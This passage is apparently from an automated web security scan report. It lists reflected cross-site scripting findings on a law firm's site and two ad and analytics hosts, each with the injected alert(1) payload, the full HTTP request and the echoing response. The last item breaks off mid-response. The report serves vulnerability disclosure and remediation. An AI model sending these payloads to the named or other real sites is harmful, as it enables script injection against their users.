The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 863d1"><script>alert(1)</script>8dd4b629ffa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/index863d1"><script>alert(1)</script>8dd4b629ffa HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:18 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/index863d1"><script>alert(1)</script>8dd4b629ffa');" title="Email Page">
...[SNIP]...

4.173. http://www.wolfgreenfield.com/industries_technologies/index [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b9f3"><script>alert(1)</script>13f530a4eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/index?8b9f3"><script>alert(1)</script>13f530a4eb=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:13 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 42976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/index?8b9f3"><script>alert(1)</script>13f530a4eb=1');" title="Email Page">
...[SNIP]...

4.174. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/v_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a405c"><script>alert(1)</script>04df5b956ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologiesa405c"><script>alert(1)</script>04df5b956ee/v_arrow.gif HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:09 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologiesa405c"><script>alert(1)</script>04df5b956ee/v_arrow.gif');" title="Email Page">
...[SNIP]...

4.175. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/v_arrow.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e36e6"><script>alert(1)</script>50931122149 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/v_arrow.gife36e6"><script>alert(1)</script>50931122149 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:10 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/v_arrow.gife36e6"><script>alert(1)</script>50931122149');" title="Email Page">
...[SNIP]...

4.176. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/v_arrow.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2cd6"><script>alert(1)</script>c085222620d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/v_arrow.gif?b2cd6"><script>alert(1)</script>c085222620d=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:08 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif?b2cd6"><script>alert(1)</script>c085222620d=1');" title="Email Page">
...[SNIP]...

4.177. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac1d"><script>alert(1)</script>e29a99f7d9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascriptcac1d"><script>alert(1)</script>e29a99f7d9e/c_smartmenus.js HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:06 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/javascriptcac1d"><script>alert(1)</script>e29a99f7d9e/c_smartmenus.js');" title="Email Page">
...[SNIP]...

4.178. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3041"><script>alert(1)</script>5a79aaed420 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript/c_smartmenus.jsc3041"><script>alert(1)</script>5a79aaed420 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:07 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/javascript/c_smartmenus.jsc3041"><script>alert(1)</script>5a79aaed420');" title="Email Page">
...[SNIP]...

4.179. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/internet-domain-names

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fda"><script>alert(1)</script>b70efdb17f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_servicese9fda"><script>alert(1)</script>b70efdb17f9/internet-domain-names HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:35 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_servicese9fda"><script>alert(1)</script>b70efdb17f9/internet-domain-names');" title="Email Page">
...[SNIP]...

4.180. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/internet-domain-names

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a92"><script>alert(1)</script>9aa36121da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/internet-domain-names75a92"><script>alert(1)</script>9aa36121da HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:35 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/internet-domain-names75a92"><script>alert(1)</script>9aa36121da');" title="Email Page">
...[SNIP]...

4.181. http://www.wolfgreenfield.com/practices_services/internet-domain-names [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/internet-domain-names

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1054a"><script>alert(1)</script>764b2703e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/internet-domain-names?1054a"><script>alert(1)</script>764b2703e6d=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:33 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 22451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/internet-domain-names?1054a"><script>alert(1)</script>764b2703e6d=1');" title="Email Page">
...[SNIP]...

4.182. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/v_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 112f8"><script>alert(1)</script>30080c8fca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services112f8"><script>alert(1)</script>30080c8fca4/v_arrow.gif HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/practices_services/internet-domain-names
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:33 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services112f8"><script>alert(1)</script>30080c8fca4/v_arrow.gif');" title="Email Page">
...[SNIP]...

4.183. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/v_arrow.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653a6"><script>alert(1)</script>2fcbffe32e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/v_arrow.gif653a6"><script>alert(1)</script>2fcbffe32e0 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/practices_services/internet-domain-names
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:33 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/v_arrow.gif653a6"><script>alert(1)</script>2fcbffe32e0');" title="Email Page">
...[SNIP]...

4.184. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/v_arrow.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ec0c"><script>alert(1)</script>f8e70455e0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/v_arrow.gif?5ec0c"><script>alert(1)</script>f8e70455e0b=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/practices_services/internet-domain-names
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:32 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/v_arrow.gif?5ec0c"><script>alert(1)</script>f8e70455e0b=1');" title="Email Page">
...[SNIP]...

4.185. http://adserving.cpxinteractive.com/st [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fb61'-alert(1)-'ef62d92b22c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5fb61'-alert(1)-'ef62d92b22c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:03:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:03:50 GMT
Content-Length: 486

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://www.google.com/search%3Fhl=en%26q=5fb61'-alert(1)-'ef62d92b22c&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1748713%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3
...[SNIP]...

4.186. http://da.newstogram.com/hg.php [DMUserTrack cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The value of the DMUserTrack cookie is copied into the HTML document as plain text between tags. The payload 80608<img%20src%3da%20onerror%3dalert(1)>ced85d84f5e was submitted in the DMUserTrack cookie. This input was echoed as 80608<img src=a onerror=alert(1)>ced85d84f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C780608<img%20src%3da%20onerror%3dalert(1)>ced85d84f5e

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
